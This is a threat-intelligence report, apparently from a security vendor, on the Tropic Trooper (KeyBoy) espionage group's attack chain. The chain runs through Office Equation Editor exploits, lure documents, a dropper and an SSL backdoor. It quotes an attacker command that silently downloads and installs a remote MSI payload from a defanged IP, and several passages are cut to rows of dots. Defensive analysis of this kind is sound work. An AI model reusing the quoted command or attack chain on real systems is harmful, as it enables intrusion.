Tropic Trooper’s New Strategy

[LASER_oneXM]

Tropic Trooper (also known as KeyBoy) levels its campaigns against Taiwanese, Philippine, and Hong Kong targets, focusing on their government, healthcare, transportation, and high-tech industries. Its operators are believed to be very organized and develop their own cyberespionage tools that they fine-tuned in their recent campaigns. Many of the tools they use now feature new behaviors, including a change in the way they maintain a foothold in the targeted network.

Attack Chain


Figure 1. Attack chain of Tropic Trooper’s operations

Here’s a summary of the attack chain of Tropic Trooper’s recent campaigns:

1. Execute a command through exploits for CVE-2017-11882 or CVE-2018-0802, security flaws in Microsoft Office’s Equation Editor (EQNEDT32.EXE).
2. Download an installer package (.msi) and install it on the system by executing the command: /c msiexec /q /i [hxxp://61[.]216[.]5[.]24/in.sys]).

...
.....
....
.........

We also observed malicious documents that don’t need to download anything from the internet as the backdoor’s dropper is already embedded in the document. This, however, doesn’t influence the overall result for the victim.

The backdoor will load the encrypted configuration file and decrypt it, then use Secure Sockets Layer (SSL) protocol to connect to command-and-control (C&C) servers.

Tropic Trooper uses exploit-laden Microsoft Office documents to deliver malware to targets. These documents use job vacancies in organizations that may be deemed socio-politically sensitive to recipients. Below is a screenshot of the document used in their latest campaigns:

....
...
......